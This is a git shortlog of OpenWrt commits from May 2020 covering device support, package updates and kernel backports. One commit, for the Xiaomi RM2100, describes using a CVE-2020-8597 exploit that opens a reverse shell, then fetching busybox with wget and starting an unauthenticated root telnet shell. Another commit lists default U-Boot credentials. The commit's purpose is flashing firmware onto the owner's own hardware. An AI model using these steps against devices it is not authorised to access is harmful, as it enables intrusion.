openwrt/staging/jow.git
4 years agousign: update to latest git HEAD
Matthias Schiffer [Sat, 23 May 2020 11:38:12 +0000 (13:38 +0200)]
usign: update to latest git HEAD

f1f65026a941 Always pad fingerprints to 16 characters

Signed-off-by: Matthias Schiffer <mschiffer@universe-factory.net>
4 years agoramips: fix 04_led_migration case syntax for mt7621
Russell Senior [Sat, 23 May 2020 08:19:50 +0000 (01:19 -0700)]
ramips: fix 04_led_migration case syntax for mt7621

Commit f761f4052c4 had bogus case syntax, the uci-defaults script threw
errors as a result and exited non-zero, probably didn't do what was
intended, but tried over and over since the non-zero exit prevents the
script from being deleted.

Fixes: f761f4052c41 ("ramips: mt7621: harmonize naming scheme for Mikrotik")
Signed-off-by: Russell Senior <russell@personaltelco.net>
[extend commit title, add Fixes]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agoath79: add support for Enterasys WS-AP3705i
David Bauer [Tue, 19 May 2020 20:49:35 +0000 (22:49 +0200)]
ath79: add support for Enterasys WS-AP3705i

Hardware
--------
SoC:    Atheros AR9344
RAM:    128M DDR2
FLASH:  2x Macronix MX25L12845EM
        2x 16MiB SPI-NOR
WLAN2:  Atheros AR9344 2x2 2T2R
WLAN5:  Atheros AR9580 2x2 2T2R
SERIAL: Cisco-RJ45 on the back (115200 8n1)

Installation
------------

The U-Boot CLI is password protected (using the same credentials as the
OS). Default is admin/new2day.

1. Download the OpenWrt initramfs-image. Place it into a TFTP server
   root directory and rename it to 1401A8C0.img. Configure the TFTP
   server to listen at 192.168.1.66/24.

2. Connect the TFTP server to the access point.

3. Connect to the serial console of the access point. Attach power and
   interrupt the boot procedure when prompted (bootdelay is 1 second).

4. Configure the U-Boot environment for booting OpenWrt from Ram and
   flash:

   $ setenv boot_openwrt 'setenv bootargs; bootm 0xbf230000'
   $ setenv ramboot_openwrt 'setenv serverip 192.168.1.66;
     tftpboot 0x85000000; bootm'
   $ setenv bootcmd 'run boot_openwrt'
   $ saveenv

5. Load OpenWrt into memory:

   $ run ramboot_openwrt

   Wait for the image to boot.

6. Transfer the OpenWrt sysupgrade image to the device. Write the image
   to flash using sysupgrade:

   $ sysupgrade -n /path/to/openwrt-sysuograde.bin

Signed-off-by: David Bauer <mail@david-bauer.net>
4 years agohostapd: add WEP as queryable build feature
David Bauer [Thu, 21 May 2020 07:50:37 +0000 (09:50 +0200)]
hostapd: add WEP as queryable build feature

Commit 472fd98c5b12 ("hostapd: disable support for Wired Equivalent
Privacy by default") made support for WEP optional.

Expose the WEP support to LuCi or other userspace tools using the
existing interface. This way they are able to remove WEP from the
available ciphers if hostapd is built without WEP support.

Signed-off-by: David Bauer <mail@david-bauer.net>
4 years agobrcm63xx: add support for ADB P.DG A4001N A-000-1A1-AX
Daniele Castro [Mon, 2 Dec 2019 15:13:44 +0000 (16:13 +0100)]
brcm63xx: add support for ADB P.DG A4001N A-000-1A1-AX

ADB P.DG A4001N A-000-1A1-AX a.k.a. Telecom Italia ADSL2+ Wi-Fi N (AGPWI)
has the same PCB as the OpenWrt's ADB P.DG A4001N1 with LEDs connected
to different GPIO PINs in active low configuration.

OpenWrt's ADB P.DG A4001N image is made for the ADB P.DG A4001N A-000-1A1-AE.
It has different LEDs configuration and flash size/layout
w.r.t the ADB P.DG A4001N A-000-1A1-AX.

Hardware:
* Board ID: 96328avng
* SoC: Broadcom BCM6328
* RAM DDR2-800: 32 Mbyte - winbond W9725G6KB-25
* Serial flash: 16 Mbyte - MXIC MX25L 12845EMI-10G
* Ethernet: 4x Ethernet 10/100 baseT
* Wifi 2.4GHz: Broadcom Corporation BCM43224/5 Wireless Network Adapter (rev 01)
* LEDs: 2x Power, 2x ADSL, 2x Internet, 2x Wi-Fi, 2x Service
* Buttons: 1x Reset, 1x WPS (named WiFi/LED)
* UART: 1x TTL 115200n8, TX  NC  RX, on J5 connector (short R192 and R193)
                         NC  GND NC

Installation via CFE:
* Stock CFE has to be overwriten with one for 96328avng boards that can upload
  .bin images with no signature check (cfe-A4001N-V0000_96328avng.bin)
* connect a serial port to the board
* Stop the boot process after power on by pressing enter
* set static IP 192.168.1.2 and subnet mask 255.255.255.0
* navigate to http://192.168.1.1/
* upload the OpenWrt image file

Signed-off-by: Daniele Castro <danielecastro@hotmail.it>
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobcm63xx: use model part of board name as variable in 01_leds
Adrian Schmutzler [Thu, 21 May 2020 17:41:41 +0000 (19:41 +0200)]
bcm63xx: use model part of board name as variable in 01_leds

This extracts the model part of the board name and uses it for the
LED string identifiers in 01_leds. As this makes statements more
generic, it will allow to merge more cases in the future.

Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agobcm63xx: replace further "ok" with "okay" in DTS files
Adrian Schmutzler [Fri, 22 May 2020 16:26:29 +0000 (18:26 +0200)]
bcm63xx: replace further "ok" with "okay" in DTS files

While "ok" is recognized in DT parsing, only "okay" is actually
mentioned as valid value. Replace it accordingly.

Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
4 years agoath79: Do not build buffalo_whr-g301n by default
Hauke Mehrtens [Thu, 21 May 2020 20:16:17 +0000 (22:16 +0200)]
ath79: Do not build buffalo_whr-g301n by default

The squashfs partition is getting too big.

Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
4 years agomac80211: Fix build on mpc85xx target
Hauke Mehrtens [Thu, 21 May 2020 19:49:21 +0000 (21:49 +0200)]
mac80211: Fix build on mpc85xx target

This fixes the following compile error seen on the mpc85xx target:
  CC [M]  /linux-mpc85xx_p2020/backports-5.7-rc3-1/drivers/net/wireless/intersil/orinoco/main.o
In file included from /builder/shared-workdir/build/staging_dir/toolchain-powerpc_8540_gcc-8.4.0_musl/include/stddef.h:17,
                 from /linux-mpc85xx_p2020/backports-5.7-rc3-1/include/uapi/linux/wireless.h:77,
                 from /linux-mpc85xx_p2020/backports-5.7-rc3-1/include/linux/wireless.h:13,
                 from /linux-mpc85xx_p2020/backports-5.7-rc3-1/drivers/net/wireless/intersil/orinoco/main.c:89:
/builder/shared-workdir/build/staging_dir/toolchain-powerpc_8540_gcc-8.4.0_musl/include/bits/alltypes.h:106:15: error: conflicting types for 'ptrdiff_t'
 typedef _Addr ptrdiff_t;
               ^~~~~~~~~
In file included from /linux-mpc85xx_p2020/backports-5.7-rc3-1/backport-include/linux/types.h:4,
                 from ./include/linux/list.h:5,
                 from /linux-mpc85xx_p2020/backports-5.7-rc3-1/backport-include/linux/list.h:3,
                 from ./include/linux/module.h:9,
                 from /linux-mpc85xx_p2020/backports-5.7-rc3-1/backport-include/linux/module.h:3,
                 from /linux-mpc85xx_p2020/backports-5.7-rc3-1/drivers/net/wireless/intersil/orinoco/main.c:79:
./include/linux/types.h:65:28: note: previous declaration of 'ptrdiff_t' was here
 typedef __kernel_ptrdiff_t ptrdiff_t;
                            ^~~~~~~~~
scripts/Makefile.build:265: recipe for target '/linux-mpc85xx_p2020/backports-5.7-rc3-1/drivers/net/wireless/intersil/orinoco/main.o' failed

Fixes: 289c6324259e ("mac80211: Update to version 5.7-rc3-1")
Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
4 years agofirewall: add rule for traceroute support
Philip Prindeville [Tue, 28 Apr 2020 00:52:51 +0000 (18:52 -0600)]
firewall: add rule for traceroute support

Running your firewall's "wan" zone in REJECT zone (1) exposes the
presence of the router, (2) depending on the sophistication of
fingerprinting tools might identify the OS and release running on
the firewall which then identifies known vulnerabilities with it
and (3) perhaps most importantly of all, your firewall can be
used in a DDoS reflection attack with spoofed traffic generating
ICMP Unreachables or TCP RST's to overwhelm a victim or saturate
his link.

This rule, when enabled, allows traceroute to work even when the
default input policy of the firewall for the wan zone has been
set to DROP.

Signed-off-by: Philip Prindeville <philipp@redfish-solutions.com>
4 years agonetifd: ingress/egress vlan qos mapping support
Hans Dedecker [Thu, 21 May 2020 18:15:29 +0000 (20:15 +0200)]
netifd: ingress/egress vlan qos mapping support

74e0222 vlandev: support setting ingress/egress QoS mappings

Signed-off-by: Hans Dedecker <dedeckeh@gmail.com>
4 years agobcm63xx: WIP: add Huawei HG253s v2 support
Álvaro Fernández Rojas [Wed, 20 May 2020 16:00:23 +0000 (18:00 +0200)]
bcm63xx: WIP: add Huawei HG253s v2 support

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobcm63xx: nand: support CFE partition tags
Álvaro Fernández Rojas [Thu, 21 May 2020 13:04:23 +0000 (15:04 +0200)]
bcm63xx: nand: support CFE partition tags

Introduce support for generating JFFS2 CFE partition tags.
This is used in NAND devices in order to verify the integrity of the JFFS2
partition.

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agoscripts: add CFE Partition Tags support
Álvaro Fernández Rojas [Thu, 21 May 2020 13:01:05 +0000 (15:01 +0200)]
scripts: add CFE Partition Tags support

Some BCM63xx NAND devices require a specific JFFS2 partition tag to verify
the JFFS2 partition validity:
u32 part_id;
u32 part_size;
u16 flags;
char part_name[33];
char part_version[21];
u32 part_crc32;

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobcm63xx: improve rgmii ctrl overrides
Álvaro Fernández Rojas [Thu, 21 May 2020 12:58:36 +0000 (14:58 +0200)]
bcm63xx: improve rgmii ctrl overrides

There are older devices which require overriding the RGMII ports, so this
shouldn't be limited and forced to BCM63268.

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobcm63xx: dgnd3700-v1: add NAND support
Álvaro Fernández Rojas [Thu, 21 May 2020 07:01:45 +0000 (09:01 +0200)]
bcm63xx: dgnd3700-v1: add NAND support

NAND is used as extra storage on this device.

Signed-off-by: Daniel Gonzalez Cabanelas <dgcbueu@gmail.com>
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobcm63xx: nand: fix v2.1 controller support
Álvaro Fernández Rojas [Thu, 21 May 2020 06:58:19 +0000 (08:58 +0200)]
bcm63xx: nand: fix v2.1 controller support

Page size shift is different from v2.2+ controllers

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agomac80211: Update to version 5.7-rc3-1
Hauke Mehrtens [Sun, 19 Apr 2020 22:33:55 +0000 (00:33 +0200)]
mac80211: Update to version 5.7-rc3-1

This updates the mac80211 backport.

The removed patches are already integrated in the upstream version.

The 131-Revert-mac80211-aes-cmac-switch-to-shash-CMAC-driver.patch patch
was manually adapted to the changes in kernel 5.7.

Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
4 years agomac80211: Update to version 5.6.8-1
Hauke Mehrtens [Sat, 18 Apr 2020 21:36:48 +0000 (23:36 +0200)]
mac80211: Update to version 5.6.8-1

This updates the mac80211 backport.

The removed patches are already integrated in the upstream version.

Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
4 years agomac80211: Update to version 5.5.19
Hauke Mehrtens [Fri, 13 Mar 2020 13:26:51 +0000 (14:26 +0100)]
mac80211: Update to version 5.5.19

This updates the mac80211 backport.

The removed patches are already integrated in the upstream version.

Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
4 years agomac80211: Update to version 5.4.36-1
Hauke Mehrtens [Tue, 28 Apr 2020 21:56:33 +0000 (23:56 +0200)]
mac80211: Update to version 5.4.36-1

This updates the mac80211 backport to the latest minor version.

The removed patch was a backport from the upstream kernel which is now
integrated.

Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
4 years agokernel: backport the I2C bus recovery for uDPU
Russell King [Thu, 21 May 2020 08:57:32 +0000 (09:57 +0100)]
kernel: backport the I2C bus recovery for uDPU

Backport the I2C bus recovery DT configuration for the uDPU that has
been queued for 5.8.

Signed-off-by: Russell King <linux@armlinux.org.uk>
4 years agokernel: backport v5.8 i2c-pxa updates
Russell King [Thu, 21 May 2020 08:57:27 +0000 (09:57 +0100)]
kernel: backport v5.8 i2c-pxa updates

Add i2c-pxa updates queued for v5.8, which add bus recovery to this
driver; this is needed for the uDPU platform.

Signed-off-by: Russell King <linux@armlinux.org.uk>
4 years agokernel: backport gpio emulated open drain output fix
Russell King [Thu, 21 May 2020 08:57:22 +0000 (09:57 +0100)]
kernel: backport gpio emulated open drain output fix

Backport the GPIO emulated open drain output fix from v5.5, which is
required for the i2c-pxa backport.

Signed-off-by: Russell King <linux@armlinux.org.uk>
4 years agohostapd: bring back mesh patches
Daniel Golle [Thu, 21 May 2020 09:15:46 +0000 (10:15 +0100)]
hostapd: bring back mesh patches

Bring back 802.11s mesh features to the level previously available
before the recent hostapd version bump. This is mostly to support use
of 802.11s on DFS channels, but also making mesh forwarding
configurable which is crucial for use of 802.11s MAC with other routing
protocols, such as batman-adv, on top.
While at it, fix new compiler warning by adapting 700-wifi-reload.patch
to upstream changes, now building without any warnings again.

Fixes: 0a3ec87a66 ("hostapd: update to latest Git hostap_2_9-1238-gdd2daf0848ed")
Signed-off-by: Daniel Golle <daniel@makrotopia.org>
4 years agowireguard: bump to 1.0.20200520
Jason A. Donenfeld [Thu, 21 May 2020 04:43:08 +0000 (22:43 -0600)]
wireguard: bump to 1.0.20200520

This version has the various slew of bug fixes and compat fixes and
such, but the most interesting thing from an OpenWRT perspective is that
WireGuard now plays nicely with cake and fq_codel. I'll be very
interested to hear from OpenWRT users whether this makes a measurable
difference. Usual set of full changes follows.

This release aligns with the changes I sent to DaveM for 5.7-rc7 and were
pushed to net.git about 45 minutes ago.

* qemu: use newer iproute2 for gcc-10
* qemu: add -fcommon for compiling ping with gcc-10

These enable the test suite to compile with gcc-10.

* noise: read preshared key while taking lock

Matt noticed a benign data race when porting the Linux code to OpenBSD.

* queueing: preserve flow hash across packet scrubbing
* noise: separate receive counter from send counter

WireGuard now works with fq_codel, cake, and other qdiscs that make use of
skb->hash. This should significantly improve latency spikes related to
buffer bloat. Here's a before and after graph from some data Toke measured:
https://data.zx2c4.com/removal-of-buffer-bloat-in-wireguard.png

* compat: support RHEL 8 as 8.2, drop 8.1 support
* compat: support CentOS 8 explicitly
* compat: RHEL7 backported the skb hash renamings

The usual RHEL churn.

* compat: backport renamed/missing skb hash members

The new support for fq_codel and friends meant more backporting work.

* compat: ip6_dst_lookup_flow was backported to 4.14, 4.9, and 4.4

The main motivation for releasing this now: three stable kernels were released
at the same time, with a patch that necessitated updating in our compat layer.

Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
4 years agohostapd: disable support for Wired Equivalent Privacy by default
Petr Štetiar [Mon, 4 May 2020 08:14:32 +0000 (10:14 +0200)]
hostapd: disable support for Wired Equivalent Privacy by default

Upstream in commit 200c7693c9a1 ("Make WEP functionality an optional
build parameter") has made WEP functionality an optional build parameter
disabled as default, because WEP should not be used for anything
anymore. As a step towards removing it completely, they moved all WEP
related functionality behind CONFIG_WEP blocks and disabled it by
default.

This functionality is subject to be completely removed in a future
release.

So follow this good security advice, deprecation notice and disable WEP
by default, but still allow custom builds with WEP support via
CONFIG_WPA_ENABLE_WEP config option till upstream removes support for
WEP completely.

Signed-off-by: Petr Štetiar <ynezz@true.cz>
4 years agohostapd: update to latest Git hostap_2_9-1238-gdd2daf0848ed
Petr Štetiar [Sun, 3 May 2020 13:20:52 +0000 (15:20 +0200)]
hostapd: update to latest Git hostap_2_9-1238-gdd2daf0848ed

Bump package to latest upstream Git HEAD which is commit dd2daf0848ed
("HE: Process HE 6 GHz band capab from associating HE STA"). Since last
update there was 1238 commits done in the upstream tree with 618 files
changed, 53399 insertions, 24928 deletions.

I didn't bothered to rebase mesh patches as the changes seems not
trivial and I don't have enough knowledge of those parts to do/test that
properly, so someone else has to forward port them, ideally upstream
them so we don't need to bother anymore. I've just deleted them for now:

 004-mesh-use-setup-completion-callback-to-complete-mesh-.patch
 005-mesh-update-ssid-frequency-as-pri-sec-channel-switch.patch
 006-mesh-inform-kernel-driver-DFS-handler-in-userspace.patch
 007-mesh-apply-channel-attributes-before-running-Mesh.patch
 011-mesh-Allow-DFS-channels-to-be-selected-if-dfs-is-ena.patch
 013-mesh-do-not-allow-pri-sec-channel-switch.patch
 015-mesh-do-not-use-offchan-mgmt-tx-on-DFS.patch
 016-mesh-fix-channel-switch-error-during-CAC.patch
 018-mesh-make-forwarding-configurable.patch

Refreshed all other patches, removed upstreamed patches:

 051-wpa_supplicant-fix-race-condition-in-mesh-mpm-new-pe.patch
 067-0001-AP-Silently-ignore-management-frame-from-unexpected-.patch
 070-driver_nl80211-fix-WMM-queue-mapping-for-regulatory-.patch
 071-driver_nl80211-fix-regulatory-limits-for-wmm-cwmin-c.patch
 090-wolfssl-fix-crypto_bignum_sum.patch
 091-0001-wolfssl-Fix-compiler-warnings-on-size_t-printf-forma.patch
 091-0002-wolfssl-Fix-crypto_bignum_rand-implementation.patch
 091-0003-wolfssl-Do-not-hardcode-include-directory-in-wpa_sup.patch
 800-usleep.patch

Tested-by: Stefan Lippers-Hollmann <s.l-h@gmx.de> [ipq8065/NBG6817; ipq40xx/MAP-AC2200]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
4 years agofuse: move package to packages feed
Rosen Penev [Sun, 17 May 2020 00:42:58 +0000 (17:42 -0700)]
fuse: move package to packages feed

This package was last updated in 2016. All of the dependent packages
are in the packages feeds, where this will be moved.

Ref: https://github.com/openwrt/packages/pull/12190
Signed-off-by: Rosen Penev <rosenp@gmail.com>
[commit subject/description tweaks]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
4 years agogeneric: platform/mikrotik: disambiguate SPDX-License-Identifier
Thibaut VARÈNE [Mon, 18 May 2020 11:07:12 +0000 (13:07 +0200)]
generic: platform/mikrotik: disambiguate SPDX-License-Identifier

I meant it to be GPL-2.0-only, as evidenced by the boilerplate.

Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
4 years agogeneric: routerbootpart.c: disambiguate SPDX-License-Identifier
Thibaut VARÈNE [Mon, 18 May 2020 11:07:11 +0000 (13:07 +0200)]
generic: routerbootpart.c: disambiguate SPDX-License-Identifier

I meant it to be GPL-2.0-only, as evidenced by the boilerplate.

Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
4 years agobuild: have config-clean deal with old temp files
Eneas U de Queiroz [Sun, 19 Apr 2020 23:12:52 +0000 (20:12 -0300)]
build: have config-clean deal with old temp files

This is a temporary commit to have 'make config-clean' remove
temporary files from the previous scripts/config version.

The .gitignore file is updated to deal with the old files as well.

Cc: Kevin Darbyshire-Bryant <ldir@darbyshire-bryant.me.uk>
Signed-off-by: Eneas U de Queiroz <cotequeiroz@gmail.com>
4 years agobuild: add option to treat recursive deps as error
Eneas U de Queiroz [Sun, 19 Apr 2020 23:12:51 +0000 (20:12 -0300)]
build: add option to treat recursive deps as error

Running make with RECURSIVE_DEP_IS_ERROR=1 will cause a hard failure
when a recursive dependency is detected.  This is useful to apply
stricter Ci tests, for example.

Signed-off-by: Eneas U de Queiroz <cotequeiroz@gmail.com>
4 years agobuild: scripts/config - update to kconfig-v5.6
Eneas U de Queiroz [Sun, 19 Apr 2020 23:12:50 +0000 (20:12 -0300)]
build: scripts/config - update to kconfig-v5.6

Major changes include:
 - Much more readable reverse dependencies separated in groups
 - Improved recursive dependency report
 - More readable .config files: add comments to signal end of menus
 - More warnings for incorrect Config.in entries, such as a 'choice'
   default not contained in the 'choice'
 - Hability to properly display pseudographics with non-latin locales
 - Recursive dependencies can optionally be treated as errors

Changes from failed dcf3e63a35d05e7e5103819c0f17195bfafe9baa attempt:
 - Recursive dependencies are treated as warnings by default
 - The option to treat them as errors is implemented as a command-line
   flag to scripts/config/conf instead of a compile-time definition
 - fixed handling of select with umnet dependencies

Cc: Petr Štetiar <ynezz@true.cz>
Cc: Jo-Philip Wich <jow@mein.io>
Signed-off-by: Eneas U de Queiroz <cotequeiroz@gmail.com>
4 years agosdk: add OpenWrt branding to menuconfig & .config
Eneas U de Queiroz [Sat, 18 Apr 2020 21:49:31 +0000 (18:49 -0300)]
sdk: add OpenWrt branding to menuconfig & .config

Set the mainmenu symbol in SDK Config.in to "OpenWrt Configuration", the
same as the main OpenWrt Config.in.  This string is is used as the name
of the top menu in menuconfig, and at the top of the .config file.  If
unset, current kconfig will use "Linux Kernel Configuration".

Signed-off-by: Eneas U de Queiroz <cotequeiroz@gmail.com>
4 years agobuild: show make output in scripts/config when V=s
Eneas U de Queiroz [Fri, 17 Apr 2020 23:57:06 +0000 (20:57 -0300)]
build: show make output in scripts/config when V=s

This should make debugging build errors in scripts/config a bit easier.

Signed-off-by: Eneas U de Queiroz <cotequeiroz@gmail.com>
4 years agosdk: fix host menu config targets using ncurses
Eneas U de Queiroz [Fri, 17 Apr 2020 16:24:10 +0000 (13:24 -0300)]
sdk: fix host menu config targets using ncurses

This applies 965f341aa9 ("build: fix host menu config targets using
ncurses") to the SDK top Makefile.

If there is a pkg-config in the staging dir, it will try to use it
instead of the host system's pkg-config; then it will fail to find the
ncurses package.  Linux's default will be used, which fails in some
cases, such as recent Gentoo systems.

Signed-off-by: Eneas U de Queiroz <cotequeiroz@gmail.com>
[fixed From: to match SoB]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
4 years agowolfssl: update to 4.4.0-stable
Eneas U de Queiroz [Fri, 1 May 2020 15:06:48 +0000 (12:06 -0300)]
wolfssl: update to 4.4.0-stable

This version adds many bugfixes, including a couple of security
vulnerabilities:
 - For fast math (enabled by wpa_supplicant option), use a constant time
   modular inverse when mapping to affine when operation involves a
   private key - keygen, calc shared secret, sign.
 - Change constant time and cache resistant ECC mulmod. Ensure points
   being operated on change to make constant time.

Signed-off-by: Eneas U de Queiroz <cotequeiroz@gmail.com>
4 years agotools: add autoconf-archive
Karel Kočí [Wed, 29 Apr 2020 10:47:58 +0000 (12:47 +0200)]
tools: add autoconf-archive

Some autotools based build systems are using autoconf-archive scripts
and are expecting them to almost always be available. This is not
required for regular releases as tar balls generated for releases
commonly have existing configure script. This is rather intended to be
used with autotools.mk's autoreconf and in cases it is not always
possible to get release tar ball.

Including this adds little to no overhead in terms of build time as
those are just m4 scripts copied to an appropriate location.

Signed-off-by: Karel Kočí <karel.koci@nic.cz>
[fixed From: to match SoB]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
4 years agokernel: bump 5.4 to 5.4.42
Petr Štetiar [Wed, 20 May 2020 10:15:27 +0000 (12:15 +0200)]
kernel: bump 5.4 to 5.4.42

Refreshed patches, removed upstreamed patch:

 generic/pending: 001-v5.4-pinctrl-qcom-fix-wrong-write-in-update_dual_edge.patch.patch

Run tested: qemu-x86-64
Build tested: x86/64, ath79/nand, imx6, sunxi/a53

Signed-off-by: Petr Štetiar <ynezz@true.cz>
4 years agokernel: kmod-ptp-qoriq: Package kernel object file
Jeffery To [Tue, 19 May 2020 09:55:34 +0000 (17:55 +0800)]
kernel: kmod-ptp-qoriq: Package kernel object file

This updates the package to contain the kernel object (.ko) file instead
of the plain object (.o) file.

Signed-off-by: Jeffery To <jeffery.to@gmail.com>
4 years agox86: fix generic kernel 5.4 config
Alberto Bursi [Tue, 21 Apr 2020 19:22:25 +0000 (21:22 +0200)]
x86: fix generic kernel 5.4 config

The last kernel update done with commit 500a02bc29b9 ("x86: Update
configuration") placed most of the updated config only in the x86_64
target.

Move the options needed by the other targets too in the x86 base config,
and add an additional option needed by those targets.

Fixes: 500a02bc29b9 ("x86: Update configuration")
Signed-off-by: Alberto Bursi <bobafetthotmail@gmail.com>
[commit subject/description tweaks]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
4 years agoramips: Add support for Xiaomi Redmi Router AC2100 (RM2100)
Richard Huynh [Thu, 23 Apr 2020 02:50:21 +0000 (12:50 +1000)]
ramips: Add support for Xiaomi Redmi Router AC2100 (RM2100)

Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot

Installation:

1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0

Restore to stock:

1. Setup PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white

Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.

Exploit and detailed instructions:

https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100

An implementation of CVE-2020-8597 against stock firmware version 1.0.14

This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.

As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.

The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh

Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>
4 years agobcm63xx: lzma-loader: rely on CHIP_ID for UART address
Álvaro Fernández Rojas [Wed, 20 May 2020 07:14:02 +0000 (09:14 +0200)]
bcm63xx: lzma-loader: rely on CHIP_ID for UART address

lzma-loader uart output wasn't working on BCM3380/BCM6362 because these
SoCs have the same processor ID.
Let's use CHIP_ID for establishing the UART base address.

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobcm63xx: lzma-loader: remove unused definitions
Álvaro Fernández Rojas [Wed, 20 May 2020 07:13:42 +0000 (09:13 +0200)]
bcm63xx: lzma-loader: remove unused definitions

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobcm63xx: image: add CVG834G CHIP_ID
Álvaro Fernández Rojas [Wed, 20 May 2020 07:23:10 +0000 (09:23 +0200)]
bcm63xx: image: add CVG834G CHIP_ID

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobcm63xx: image: rename CFE_CHIP_ID to CHIP_ID
Álvaro Fernández Rojas [Wed, 20 May 2020 07:21:34 +0000 (09:21 +0200)]
bcm63xx: image: rename CFE_CHIP_ID to CHIP_ID

Rename CFE_CHIP_ID to a generic name that doesn't involve CFE.

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobcm63xx: fix AD1018 WLAN led
Álvaro Fernández Rojas [Wed, 20 May 2020 06:40:52 +0000 (08:40 +0200)]
bcm63xx: fix AD1018 WLAN led

Standard AD1018 has lower case LEDs.

Fixes: 5f826919232d ("bcm63xx: add unmodded SERCOMM AD1018 support")
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobcm63xx-cfe: fix build with CONFIG_AUTOREMOVE
Álvaro Fernández Rojas [Wed, 20 May 2020 06:37:04 +0000 (08:37 +0200)]
bcm63xx-cfe: fix build with CONFIG_AUTOREMOVE

When CONFIG_AUTOREMOVE is enabled, CFE binaries are removed before the
image creation.
Install CFE binaries to kernel directory and let autoremove clean the
files in PKG_BUILD_DIR.
Also drop unneeded tar cmd/options.

Fixes: dcee4eaa4214 ("bcm63xx-cfe: add package with CFE RAM binaries")
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agowireguard-tools: bump to 1.0.20200513
Jason A. Donenfeld [Wed, 20 May 2020 01:39:08 +0000 (19:39 -0600)]
wireguard-tools: bump to 1.0.20200513

* ipc: add support for openbsd kernel implementation
* ipc: cleanup openbsd support
* wg-quick: add support for openbsd kernel implementation
* wg-quick: cleanup openbsd support

Very exciting! wg(8) and wg-quick(8) now support the kernel implementation for
OpenBSD. OpenBSD is the second kernel, after Linux, to receive full fledged
and supported WireGuard kernel support. We'll probably send our patch set up
to the list during this next week. `ifconfig wg0 create` to make an interface,
and `wg ...` like usual to configure WireGuard aspects of it, like usual.

* wg-quick: support dns search domains

If DNS= has a non-IP in it, it is now treated as a search domain in
resolv.conf.  This new feature will be rolling out across our various GUI
clients in the next week or so.

* Makefile: simplify silent cleaning
* ipc: remove extra space
* git: add gitattributes so tarball doesn't have gitignore files
* terminal: specialize color_mode to stdout only

Small cleanups.

* highlighter: insist on 256-bit keys, not 257-bit or 258-bit

The highlighter's key checker is now stricter with base64 validation.

* wg-quick: android: support application whitelist

Android users can now have an application whitelist instead of application
blacklist.

* systemd: add wg-quick.target

This enables all wg-quick at .services to be restarted or managed as a unit via
wg-quick.target.

* Makefile: remember to install all systemd units

Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
4 years agobcm63xx: add unmodded SERCOMM AD1018 support
Álvaro Fernández Rojas [Tue, 19 May 2020 11:29:12 +0000 (13:29 +0200)]
bcm63xx: add unmodded SERCOMM AD1018 support

Until now only HW modded SPI flash version was supported.

BCM6328 with 64M RAM and 128M NAND.
More info: https://openwrt.org/toh/sercomm/ad1018

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agokernel: mtdsplit: bcm_wfi: add sercomm support
Álvaro Fernández Rojas [Tue, 19 May 2020 11:28:06 +0000 (13:28 +0200)]
kernel: mtdsplit: bcm_wfi: add sercomm support

SERCOMM creates separates partitions for cferam.

Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
4 years agobcm63xx: bcm6328: fix strapbus boot sel
